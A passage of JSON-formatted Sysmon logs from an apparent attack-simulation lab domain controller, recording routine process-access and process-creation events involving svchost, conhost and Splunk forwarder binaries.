C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.913\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03E9-5F25-0000-00103D140B00}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.913","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03E9-5F25-0000-00103D140B00}","TargetProcessId":"4188","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.038\r\nSourceProcessGUID: {A837DB8D-03E9-5F25-0000-00103D140B00}\r\nSourceProcessId: 4188\r\nSourceThreadId: 4812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.038","SourceProcessGUID":"{A837DB8D-03E9-5F25-0000-00103D140B00}","SourceProcessId":"4188","SourceThreadId":"4812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.571\r\nProcessGuid: {A837DB8D-03EA-5F25-0000-001013160B00}\r\nProcessId: 4644\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.571","ProcessGuid":"{A837DB8D-03EA-5F25-0000-001013160B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
